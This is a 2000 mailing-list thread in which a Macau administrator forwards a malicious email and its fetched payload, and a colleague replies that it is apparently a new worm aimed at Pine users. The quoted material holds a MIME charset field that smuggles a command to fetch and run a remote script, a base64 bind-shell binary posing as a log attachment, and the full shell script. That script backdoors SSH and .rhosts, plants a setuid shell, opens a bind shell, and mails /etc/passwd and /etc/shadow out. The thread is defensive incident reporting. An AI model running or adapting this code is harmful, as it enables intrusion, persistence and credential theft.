Re: Is it a TrajonHorse?

Wed, 17 May 2000 02:59:00 -0500 

Hi Tang,

Thanks for your information. 

It properly is a new virus (found only after 16 May) which is especially
designed for UNIX administrator who like to use PINE as the Email client.

You can find more discussion in the newsgroup... for example,

http://x42.deja.com/getdoc.xp?AN=624410603&search=thread&CONTEXT=958548790.554172430&HIT_CONTEXT=958548790.554172430&HIT_NUM=1&hitnum=0

Best regards,
Voyage
------------------------------------------------------------------------------
Io Hio Hong, Voyage 
          
CI, Centro de Informatica     (http://www-ci.ipm.edu.mo)        
Macau Polytechnic Institute   (http://www.ipm.edu.mo)
Tel: 5996175                   Fax: 530505 
Email: [EMAIL PROTECTED]       ICQ: 4050204

On Wed, 17 May 2000, Tang wrote:

> Hello,
> 
>     I received an email attention to root with strange contents. The
> whole email is shown for your reference.
>     When I read the logs attached with the mail, I don't find anything
> (ip address, dns) relating to our domain.
> 
>     Then I try to know where is the email from, so I point my browser to
> http://tofan.onza.net. The browser ouputs
>     a page of shell scripts and program code! They as also attached at
> the end of this mail. Then I start to scan the
>     whole email carefully, and find a line of strange Content-Type
> statement as follows:
> 
>     Content-Type: TEXT/PLAIN;
> charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"
> name="emailf" Content-Transfer-Encoding: BASE64
> 
>     Looks like to start Lynx to browse the page with the susipous codes,
> then run the code to steal the /etc/passwd
>     file!
> 
>     Seems like my Pine didn't run Lynx automatically..... but not sure
> the harm to us yet!
> 
>     Do you even receive some email like this? Any comments?
> 
> regards,
> Tang.
> 
> UMac, INESC Macau
> R.A.
> 
> 
> ============================== Begining of email
> =============================
> >From [EMAIL PROTECTED]  Mon May 15 15:18:55 2000
> Received: from mars.fontijne.nl (smtp.fontijne.nl [195.7.212.130])
>  by inesc-macau.org.mo (8.9.2/8.9.2/Debian/GNU) with ESMTP id PAA16075
>  for <[EMAIL PROTECTED]>; Mon, 15 May 2000 15:16:41 +0800
> (CST)
> Received: from Bastion.Fontijne.nl (195.7.212.131 [195.7.212.131]) by
> mars.fontijne.nl with SMTP (Microsoft Exchange Internet Mail Service
> Version 5.5.2650.21)
>  id K69W8LSQ; Mon, 15 May 2000 08:55:41 +0200
> Received: from atl-qbu-zpn-vty3.as.wcom.net ([216.192.215.3]) by
> Bastion.Fontijne.nl; Mon, 15 May 2000 08:48:49 +0000 (GMT)
> Message-ID: <[EMAIL PROTECTED]>
> Date: Sat, 13 May 2000 21:15:05 -0400 (EDT)
> From: root <[EMAIL PROTECTED]>
> Subject: DOS attack, log file attached!
> MIME-Version: 1.0
> To: [EMAIL PROTECTED]
> Content-Type: MULTIPART/MIXED;
> BOUNDARY="-1463811839-1047689522-958180505=:1450"
> Status: RO
> X-Status:
> 
>   This message is in MIME format.  The first part should be readable
> text,
>   while the remaining parts are likely unreadable without MIME-aware
> tools.
>   Send mail to [EMAIL PROTECTED] for more info.
> 
> ---1463811839-1047689522-958180505=:1450
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> 
> THIS IS TO INFORM YOU THAT A DOS ATTACK WAS LOGGED ON A
> SECURITIES AND EXCHANGE COMMISION INTERNET FIREWALL
> FROM YOUR DOMAIN.
> AN EXCERPT FROM OUR LOGS IS ATTACHED BELOW.
> ALL TIMES ARE US EASTERN AND ARE SYNCED WITH NTP.
> 
> Jerry Leininser
> [EMAIL PROTECTED]
> 
> ---2463811839-1047689522-958180505=:1450
> Content-Type: APPLICATION/octet-stream;
> name="log.txt.tofan.onza.net.exit"
> Content-Transfer-Encoding: BASE64
> Content-ID: <[EMAIL PROTECTED]>
> Content-Description:
> 
> f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAkIYECDQAAABcDAAAAAAAADQAIAAF
> ACgAFwAUAAYAAAA0AAAANIAECDSABAigAAAAoAAAAAUAAAAEAAAAAwAAANQA
> AADUgAQI1IAECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQITQoA
> AE0KAAAFAAAAABAAAAEAAABQCgAAUJoECFCaBAj0AAAA+AAAAAYAAAAAEAAA
> AgAAALwKAAC8mgQIvJoECIgAAACIAAAABgAAAAQAAAAvbGliL2xkLWxpbnV4
> LnNvLjEAABEAAAAfAAAAAAAAABwAAAAWAAAAGgAAABkAAAAAAAAADQAAABEA
> AAATAAAACgAAAAkAAAAYAAAAAQAAABcAAAAOAAAAFAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAUAAAACAAAAAAAAAAcAAAAAAAAA
> CAAAAAAAAAAAAAAACwAAAAAAAAAGAAAAEAAAAAAAAAASAAAAFQAAAB4AAAAd
> AAAAGwAAAAAAAAADAAAADwAAAAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAsA
> AABYhQQIHgAAABIAAAASAAAAaIUECCgAAAAiAAAAGQAAALyaBAgAAAAAEQDx
> /yIAAAB4hQQIfgAAABIAAAAoAAAAiIUECAAAAAAiAAAALQAAAJiFBAheAAAA
> IgAAADQAAABQmgQIBAAAABEADAA+AAAAqIUECDYAAAASAAAARAAAALiFBAhm
> AAAAIgAAAEkAAABAhQQIAAAAABIABwBPAAAAyIUECF4AAAAiAAAAVgAAANiF
> BAhGAAAAEgAAAGIAAABQmgQIBAAAACAADABqAAAA6IUECF4AAAAiAAAAbwAA
> AESbBAgCAAAAEQARAH0AAAD4hQQIVAAAABIAAACEAAAACIYECFYAAAAiAAAA
> iwAAABiGBAgAAAAAIgAAAJAAAACQiQQIAAAAABIACgCWAAAAKIYECDQAAAAS
> AAAAnQAAAGSaBAgAAAAAEQDx/7MAAAA4hgQIDQAAACIAAAC5AAAASIYECIAA
> AAASAAAAvgAAAFiGBAg+AAAAEgAAAMkAAABohgQIwAAAABIAAADQAAAAeIYE
> CAAAAAAiAAAA1gAAAIyJBAgAAAAAEQDx/90AAABEmwQIAAAAABEA8f/kAAAA
> RJsECAAAAAARAPH/8AAAAEibBAgAAAAAEQDx/wBsaWJjLnNvLjUAc3RyY3B5
> AHByaW50ZgBfRFlOQU1JQwBleGVjbABkdXAyAHNvY2tldABfX2Vudmlyb24A
> Ynplcm8Ac2VuZABfaW5pdABhY2NlcHQAX19saWJjX2luaXQAZW52aXJvbgBi
> aW5kAF9fZnB1X2NvbnRyb2wAc2lnbmFsAGxpc3RlbgBmb3JrAF9maW5pAGF0
> ZXhpdABfR0xPQkFMX09GRlNFVF9UQUJMRV8AaHRvbnMAZXhpdABfX3NldGZw
> dWN3AHN0cmxlbgBjbG9zZQBfZXRleHQAX2VkYXRhAF9fYnNzX3N0YXJ0AF9l
> bmQAAAAARJsECAUPAABwmgQIBwEAAHSaBAgHAgAAeJoECAcEAAB8mgQIBwUA
> AICaBAgHBgAAhJoECAcIAACImgQIBwkAAIyaBAgHCwAAkJoECAcMAACUmgQI
> Bw4AAJiaBAgHEAAAnJoECAcRAACgmgQIBxIAAKSaBAgHFAAAqJoECAcWAACs
> mgQIBxcAALCaBAgHGAAAtJoECAcZAAC4mgQIBxoAAAAAAAAAAAAA6CMEAADC
> AAD/NWiaBAj/JWyaBAgAAAAA/yVwmgQIaAAAAADp4P////8ldJoECGgIAAAA
> 6dD/////JXiaBAhoEAAAAOnA/////yV8mgQIaBgAAADpsP////8lgJoECGgg
> AAAA6aD/////JYSaBAhoKAAAAOmQ/////yWImgQIaDAAAADpgP////8ljJoE
> CGg4AAAA6XD/////JZCaBAhoQAAAAOlg/////yWUmgQIaEgAAADpUP////8l
> mJoECGhQAAAA6UD/////JZyaBAhoWAAAAOkw/////yWgmgQIaGAAAADpIP//
> //8lpJoECGhoAAAA6RD/////JaiaBAhocAAAAOkA/////yWsmgQIaHgAAADp
> 8P7///8lsJoECGiAAAAA6eD+////JbSaBAhoiAAAAOnQ/v///yW4mgQIaJAA
> AADpwP7//wAAAAAAAAAAWYnjieCJygHSAdIB0IPABDHtVVVVieVQU1G4iAAA
> ALsAAAAAzYCLRCQIo1CaBAgPtwVEmwQIUOiM////g8QE6AT///9okIkECOhK
> ////g8QE6Fr+///oSQAAAFDoV////1uNtCYAAAAAjbQmAAAAALgBAAAAzYDr
> 9420JgAAAABTu2CaBAiDPWCaBAgAdA2QiwP/0IPDBIM7AHX0W8ONNsOQkJBV
> ieWD7DjHRfyYiQQIx0X4pokECMdF9MyJBAjoxP7//4nAhcB0CmoB6Of+//+D
> xARmx0XYAgBoOTAAAOjE/v//g8QEicBmiUXax0XcAAAAAGoIjUXYjVAIUugW
> /v//g8QIaPeJBAiLRQyLEFLos/3//4PECGoBahHoR/7//4PECGoAagFqAujZ
> /f//g8QMicCJRfCDffAAfRtoDYoECOiR/f//g8QEicBQ6Gb+//+DxASNdgBq
> EI1F2FCLRfBQ6PH9//+DxAyJwIXAfRhoG4oECOhe/f//g8QEicBQ6DP+//+D
> xARqBYtF8FDo5f3//4PECInAhcB9GGgnigQI6DL9//+DxASJwFDoB/7//4PE
> BMdF6BAAAACNRehQjUXIUItF8FDobP3//4PEDInAiUXsg33sAH0aaDWKBAjo
> 9Pz//4PEBInAUOjJ/f//g8QEjTboj/3//4nAhcAPhL0AAABqAItF/FDoyv3/
> /4PEBInAUItF/FCLRexQ6Af9//+DxBBqAItF+FDoqf3//4PEBInAUItF+FCL
> RexQ6Ob8//+DxBBqAItF9FDoiP3//4PEBInAUItF9FCLRexQ6MX8//+DxBBq
> AItF7FDoh/z//4PECGoBi0XsUOh5/P//g8QIagKLRexQ6Gv8//+DxAhqAGhC
> igQIaEWKBAhoRYoECOhC/P//g8QQi0XsUOg2/f//g8QEagDo/Pz//4PEBJCL
> RexQ6B/9//+DxATp6v7//412AMnDkJBTu1SaBAiDPVSaBAj/dA2QiwP/0IPD
> /IM7/3X0W8ONNsOQkJAAAAAA6Hv9///CAAAKQ29ubmVjdGVkIQoKAFRoaXMg
> ZmluZSB0b29sIGNvZGVkIGJ5IEJyb25jIEJ1c3RlcgoAUGxlYXNlIGVudGVy
> IGVhY2ggY29tbWFuZCBmb2xsb3dlZCBieSAnOycKAElfZGlkX25vdF9jaGFu
> Z2VfSElERQBTb2NrZXQgZXJyb3IKAEJpbmQgZXJyb3IKAExpc3RlbiBlcnJv
> cgoAQWNjZXB0IGVycm9yAC1pAC9iaW4vc2gAAAAAAAAAAP////8AAAAA////
> /wAAAAC8mgQIAAAAAAAAAABehQQIboUECH6FBAiOhQQInoUECK6FBAi+hQQI
> zoUECN6FBAjuhQQI/oUECA6GBAgehgQILoYECD6GBAhOhgQIXoYECG6GBAh+
> hgQIAQAAAAEAAAAMAAAAQIUECA0AAACQiQQIBAAAAOiABAgFAAAAoIMECAYA
> AACwgQQICgAAAPUAAAALAAAAEAAAABUAAAAAAAAAAwAAAGSaBAgCAAAAmAAA
> ABQAAAARAAAAFwAAAKCEBAgRAAAAmIQECBIAAAAIAAAAEwAAAAgAAAAAAAAA
> AAAAAABHQ0M6IChHTlUpIDIuNy4yLjEAAEdDQzogKEdOVSkgMi43LjIuMQAA
> R0NDOiAoR05VKSAyLjcuMi4xAAgAAAAAAAAAAQAAADAxLjAxAAAACAAAAAAA
> AAABAAAAMDEuMDEAAAAIAAAAAAAAAAEAAAAwMS4wMQAAAAAuc3ltdGFiAC5z
> dHJ0YWIALnNoc3RydGFiAC5pbnRlcnAALmhhc2gALmR5bnN5bQAuZHluc3Ry
> AC5yZWwuYnNzAC5yZWwucGx0AC5pbml0AC5wbHQALnRleHQALmZpbmkALnJv
> ZGF0YQAuZGF0YQAuY3RvcnMALmR0b3JzAC5nb3QALmR5bmFtaWMALmJzcwAu
> Y29tbWVudAAubm90ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAGwAAAAEAAAACAAAA1IAECNQAAAATAAAAAAAAAAAAAAABAAAA
> AAAAACMAAAAFAAAAAgAAAOiABAjoAAAAyAAAAAMAAAAAAAAABAAAAAQAAAAp
> AAAACwAAAAIAAACwgQQIsAEAAPABAAAEAAAAAQAAAAQAAAAQAAAAMQAAAAMA
> AAACAAAAoIMECKADAAD1AAAAAAAAAAAAAAABAAAAAAAAADkAAAAJAAAAAgAA
> AJiEBAiYBAAACAAAAAMAAAARAAAABAAAAAgAAABCAAAACQAAAAIAAACghAQI
> oAQAAJgAAAADAAAACAAAAAQAAAAIAAAASwAAAAEAAAAGAAAAQIUECEAFAAAI
> AAAAAAAAAAAAAAAQAAAAAAAAAFEAAAABAAAABgAAAEiFBAhIBQAAQAEAAAAA
> dHJ0YWIALnNoc3RydGFiAC5pbnRlcnAALmhhc2gALmR5bnN5bQAuZHluc3Ry
> AC5yZWwuYnNzAC5yZWwucGx0AC5pbml0AC5wbHQALnRleHQALmZpbmkALnJv
> ZGF0YQAuZGF0YQAuY3RvcnMALmR0b3JzAC5nb3QALmR5bmFtaWMALmJzcwAu
> Y29tbWVudAAubm90ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAGwAAAAEAAAACAAAA1IAECNQAAAATAAAAAAAAAAAAAAABAAAA
> AAAAACMAAAAFAAAAAgAAAOiABAjoAAAAyAAAAAMAAAAAAAAABAAAAAQAAAAp
> AAAACwAAAAIAAACwgQQIsAEAAPABAAAEAAAAAQAAAAQAAAAQAAAAMQAAAAMA
> AAACAAAAoIMECKADAAD1AAAAAAAAAAAAAAABAAAAAAAAADkAAAAJAAAAAgAA
> AJiEBAiYBAAACAAAAAMAAAARAAAABAAAAAgAAABCAAAACQAAAAIAAACghAQI
> oAQAAJgAAAADAAAACAAAAAQAAAAIAAAASwAAAAEAAAAGAAAAQIUECEAFAAAI
> AAAAAAAAAAAAAAAQAAAAAAAAAFEAAAABAAAABgAAAEiFBAhIBQAAQAEAAAAA
> AAAAAAAABAAAAAQAAABWAAAAAQAAAAYAAACQhgQIkAYAAPwCAAAAAAAAAAAA
> ABAAAAAAAAAAXAAAAAEAAAAGAAAAkIkECJAJAAAIAAAAAAAAAAAAAAAQAAAA
> AAAAAGIAAAABAAAAAgAAAJiJBAiYCQAAtQAAAAAAAAAAAAAAAQAAAAAAAABq
> AAAAAQAAAAMAAABQmgQIUAoAAAQAAAAAAAAAAAAAAAQAAAAAAAAAcAAAAAEA
> AAADAAAAVJoECFQKAAAIAAAAAAAAAAAAAAAEAAAAAAAAAHcAAAABAAAAAwAA
> AFyaBAhcCgAACAAAAAAAAAAAAAAABAAAAAAAAAB+AAAAAQAAAAMAAABkmgQI
> ZAoAAFgAAAAAAAAAAAAAAAQAAAAEAAAAgwAAAAYAAAADAAAAvJoECLwKAACI
> AAAABAAAAAAAAAAEAAAACAAAAIwAAAAIAAAAAwAAAESbBAhECwAABAAAAAAA
> AAAAAAAABAAAAAAAAACRAAAAAQAAAAAAAAAAAAAARAsAADwAAAAAAAAAAAAA
> AAEAAAAAAAAAmgAAAAcAAAAAAAAAPAAAAIALAAA8AAAAAAAAAAAAAAABAAAA
> AAAAABEAAAADAAAAAAAAAAAAAAC8CwAAoAAAAAAAAAAAAAAAAQAAAAAAAAAB
> AAAAAgAAAAAAAAssssssssssssssssssssssKQAAAAQAAAAQAAAACQAAAAMA
> AAAAAAAAAAAAAJQUAAC+AQAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAADAAEAAAAAAAAAAAAAAAAAAwACAAAAAAAAAAAA
> AAAAAAMAAwAAAAAAAAAAAAAAAAADAAQAAAAAAAAAAAAAAAAAAwAFAAAAAAAA
> AAAAAAAAAAMABgAAAAAAAAAAAAAAAAADAAcAAAAAAAAAAAAAAAAAAwAIAAAA
> AAAAAAAAAAAAAAMACQAAAAAAAAAAAAAAAAADAAoAAAAAAAAAAAAAAAAAAwAL
> AAAAAAAAAAAAAAAAAAMADAAAAAAAAAAAAAAAAAADAA0AAAAAAAAAAAAAAAAA
> AwAOAAAAAAAAAAAAAAAAAAMADwAAAAAAAAAAAAAAAAADABAAAAAAAAAAAAAA
> AAAAAwARAAAAAAAAAAAAAAAAAAMAEgAAAAAAAAAAAAAAAAADABMAAAAAAAAA
> AAAAAAAAAwAUAAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAAAAAAAAADABYAAQAA
> AAAAAAAAAAAABADx/wwAAABoiQQIAAAAAAAACQAbAAAAaIkECAAAAAACAAkA
> MQAAAFiaBAgAAAAAAQANAD4AAACIiQQIAAAAAAIACQBJAAAAVJoECAAAAAAB
> AAwAVwAAAGCaBAgAAAAAAQAOAGQAAAAAAAAAAAAAAAQA8f9rAAAAAIcECAAA
> AAAAAAkAAQAAAAAAAAAAAAAABADx/wwAAAAQhwQIAAAAAAAACQBwAAAAEIcE
> CAAAAAACAAkAhgAAAFyaBAgAAAAAAQAOAJQAAAAwhwQIAAAAAAIACQBJAAAA
> VJoECAAAAAABAAwAnwAAAFSaBAgAAAAAAQANAK0AAAAAAAAAAAAAAAQA8f8M
> AAAANIcECAAAAAAAAAkAuQAAAFiFBAgeAAAAEgAAAMAAAABohQQIKAAAACIA
> AADHAAAAvJoECAAAAAARAPH/0AAAAIyJBAgAAAAAEQDx/9cAAAB4hQQIfgAA
> ABIAAADdAAAAiIUECAAAAAAiAAAA4gAAAJiFBAheAAAAIgAAAOkAAABQmgQI
> BAAAABEADADzAAAAqIUECDYAAAASAAAA+QAAALiFBAhmAAAAIgAAAP4AAABA
> hQQIAAAAABIABwAEAQAAyIUECF4AAAAiAAAACwEAANiFBAhGAAAAEgAAABcB
> AABQmgQIBAAAACAADAAfAQAA6IUECF4AAAAiAAAAJAEAAESbBAgCAAAAEQAR
> ADIBAACQhgQIgAAAABIACQA5AQAA+IUECFQAAAASAAAAQAEAAJCGBAgAAAAA
> EAAJAE8BAAAIhgQIVgAAACIAAABWAQAAGIYECAAAAAAiAAAAWwEAAESbBAgA
> AAAAEQDx/2cBAAA0hwQIMgIAABIACQBsAQAAkIkECAAAAAASAAoAcgEAACiG
> BAg0AAAAEgAAAHkBAABEmwQIAAAAABEA8f+AAQAAZJoECAAAAAARAPH/lgEA
> AEibBAgAAAAAEQDx/5sBAAA4hgQIDQAAACIAAAChAQAASIYECIAAAAASAAAA
> pgEAAFiGBAg+AAAAEgAAALEBAABohgQIwAAAABIAAAC4AQAAeIYECAAAAAAi
> AAAAAGNydHN0dWZmLmMAZ2NjMl9jb21waWxlZC4AX19kb19nbG9iYWxfY3Rv
> cnNfYXV4AF9fQ1RPUl9FTkRfXwBpbml0X2R1bW15AGZvcmNlX3RvX2RhdGEA
> X19EVE9SX0VORF9fAGNydDAuUwBkb25lAF9fZG9fZ2xvYmFsX2R0b3JzX2F1
> eABfX0RUT1JfTElTVF9fAGZpbmlfZHVtbXkAX19DVE9SX0xJU1RfXwBibGFj
> a2hvbGUuYwBzdHJjcHkAcHJpbnRmAF9EWU5BTUlDAF9ldGV4dABleGVjbABk
> dXAyAHNvY2tldABfX2Vudmlyb24AYnplcm8Ac2VuZABfaW5pdABhY2NlcHQA
> X19saWJjX2luaXQAZW52aXJvbgBiaW5kAF9fZnB1X2NvbnRyb2wAX3N0YXJ0
> AHNpZ25hbABfX19jcnRfZHVtbXlfXwBsaXN0ZW4AZm9yawBfX2Jzc19zdGFy
> dABtYWluAF9maW5pAGF0ZXhpdABfZWRhdGEAX0dMT0JBTF9PRkZTRVRfVEFC
> TEVfAF9lbmQAaHRvbnMAZXhpdABfX3NldGZwdWN3AHN0cmxlbgBjbG9zZQA=
> ---2463811839-1047689522-958180505=:1450--
> ---1463811839-1047689522-958180505=:1450
> Content-Type: TEXT/PLAIN;
> charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"
> name="emailf" Content-Transfer-Encoding: BASE64
> Content-Description: THE LOGS
> Content-Disposition: attachment; filename="emailf"
> 
> 
> 
> 
> 
> 
> 
> 
> PLEASE FORGIVE US IF YOUR SYSTEM WAS ERRORNEOUSLY ACUSED,
> WE HAVE FACED A KERNEL PANIC!
> 
> Sep 16 17:29:21 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1371 \
>               206.121.213.44:8080 L=60 S=0x00 I=63749 F=0x0040 T=55
> .S....
> Sep 16 17:29:24 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1371 \
>               206.121.213.44:8080 L=60 S=0x00 I=63928 F=0x0040 T=55
> .S....
> Sep 16 17:29:30 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1371 \
>               206.121.213.44:8080 L=60 S=0x00 I=64281 F=0x0040 T=55
> .S....
> Sep 16 17:29:42 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1371 \
>               206.121.213.44:8080 L=60 S=0x00 I=64978 F=0x0040 T=55
> .S....
> Sep 16 17:29:45 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1389 \
>               206.121.213.44:8080 L=60 S=0x00 I=65097 F=0x0040 T=55
> .S....
> Sep 16 17:29:48 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1389 \
>               206.121.213.44:8080 L=60 S=0x00 I=65205 F=0x0040 T=55
> .S....
> Sep 16 17:29:54 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1389 \
>               206.121.213.44:8080 L=60 S=0x00 I=22 F=0x0040 T=55 .S....
> Sep 16 17:30:05 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1412 \
>               206.121.213.44:8080 L=60 S=0x00 I=775 F=0x0040 T=55 .S....
> 
> Sep 16 17:30:06 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1371 \
>               206.121.213.44:8080 L=60 S=0x00 I=787 F=0x0040 T=55 .S....
> 
> Sep 16 17:30:11 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1412 \
>               206.121.213.44:8080 L=60 S=0x00 I=1014 F=0x0040 T=55
> .S....
> Sep 16 17:30:21 secfw3 kernel: IP fw-in deny eth1 TCP
> 209.16.136.144:1423 \
>               206.121.213.44:8080 L=60 S=0x00 I=1438 F=0x0040 T=55
> .S....
> 
> 
> ---1463811839-1047689522-958180505=:1450--
> 
> ================================ End of email
> ==============================
> 
> 
> 
> 
> ============================== Source of web page
> ==============================
> grep "[EMAIL PROTECTED]" ~/.ssh/authorized_keys >/dev/null 2>&1 || if [ 0 ];
> then
> if [ ! -d ~/.ssh ]
> then umask 022 >/dev/null 2>&1;mkdir ~/.ssh >/dev/null 2>&1
> echo "+ +" >> ~/.rhosts 2>/dev/null
> fi
> umask 022 >/dev/null 2>&1
> echo "512 35
> 9785877609308338986917478061014184970982460312434529051173539551539508793288925026879592531038110506684705572154197270221242712482140435531967239855453591
> [EMAIL PROTECTED]" >> ~/.ssh/authorized_keys 2>/dev/null
> cat << __EOF__ > /tmp/io.c
> #define PORT 56789
> #include <stdio.h>
> #include <signal.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
> 
> int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
> struct sockaddr_in serv_addr;
> struct sockaddr_in client_addr;
> 
> int main (int argc, char **argv)
> {
> 
>     soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
>     if (soc_des == -1)
>         exit(-1);
>     bzero((char *) &serv_addr, sizeof(serv_addr));
> strcpy(argv[0],"updated");
>     serv_addr.sin_family = AF_INET;
>     serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
>     serv_addr.sin_port = htons(PORT);
>     soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr,
> sizeof(serv_addr));
>     if (soc_rc != 0)
>         exit(-1);
>     if (fork() != 0)
>         exit(0);
>     setpgrp();
>     signal(SIGHUP, SIG_IGN);
>     if (fork() != 0)
>         exit(0);
>     soc_rc = listen(soc_des, 5);
>     if (soc_rc != 0)
>         exit(0);
>     while (1) {
>         soc_len = sizeof(client_addr);
>         soc_cli = accept(soc_des, (struct sockaddr *) &client_addr,
> &soc_len);
>         if (soc_cli < 0)
>             exit(0);
>         cli_pid = getpid();
>         server_pid = fork();
>         if (server_pid != 0) {
>             dup2(soc_cli,0);
>             dup2(soc_cli,1);
>             dup2(soc_cli,2);
>             execl("/bin/sh","sh", "-i",(char *)0);
>             close(soc_cli);
>             exit(0);
>         }
>     close(soc_cli);
>     }
> }
> __EOF__
> gcc -o /tmp/io /tmp/io.c >/dev/null 2>&1
> /tmp/io >/dev/null 2>&1 ||mkdir /tmp/.pkoss493 >/dev/null 2>&1&&cp
> /bin/sh /tmp/.pkoss493/.rc >/dev/null 2>&1;chmod 4715 /tmp/.pkoss493/.rc
> >/dev/null 2>&1
> rm -rf /tmp/io.c
> rm -rf /tmp/io
> mail -s hhp000 [EMAIL PROTECTED] >/dev/null 2>&1 < /etc/passwd
> echo "`hostname -i  2>&1` - `id  2>&1`- `uname -a  2>&1`- `ls -al ~
> 2>&1` - `cat /etc/shadow 2>&1`" | mail -s hhp001 [EMAIL PROTECTED]
> 2>/dev/null
> chmod og-w ~ >/dev/null 2>&1
> chmod og-w ~/.ssh >/dev/null 2>&1
> fi
> ============================== End of source of web page
> ==========================
> 
>

Reply via email to